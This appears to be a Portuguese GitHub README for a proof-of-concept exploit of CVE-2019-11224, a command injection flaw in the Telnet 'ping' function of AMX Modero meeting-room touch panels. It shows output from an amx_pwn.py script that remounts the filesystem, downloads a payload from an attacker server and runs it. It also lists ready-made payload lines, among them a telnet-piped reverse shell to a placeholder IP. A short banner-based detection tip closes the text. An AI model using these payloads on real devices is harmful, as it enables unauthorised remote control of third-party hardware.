
Execução de Código no Modero AMX (CVE-2019–11224)
Este repositório contém algumas fontes sobre CVE-2019–11224 (https://link.medium.com/zukA0oCnV8) porque notei que o link não funciona mais no site oficial do NIST.
Os dispositivos Modero AMX são essencialmente painéis de toque para salas de reunião; podem ser observados em muitos ambientes diferentes e geralmente têm o Telnet aberto.
Como eles emulam um console pouco ideal usando Telnet, existe uma vulnerabilidade de injeção de código através da função "ping" usando separadores de comandos.
Desde que criei originalmente este repositório GitHub e mexi em dispositivos AMX, criei um POC e um processo de exploração para obter reverse shells com esta vulnerabilidade. Espero que te traga alegria :}
Escrevi um POC amx_pwn.py que deve ser útil. Exemplo de saída abaixo:
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7 Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...
ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMDtelnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMDping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMDVerifique os banners do Telnet (normalmente na porta 23) contendo:
Welcome to Modero: ou Copyright (C) AMX LLC. Procure por versões anteriores a 2.87.13.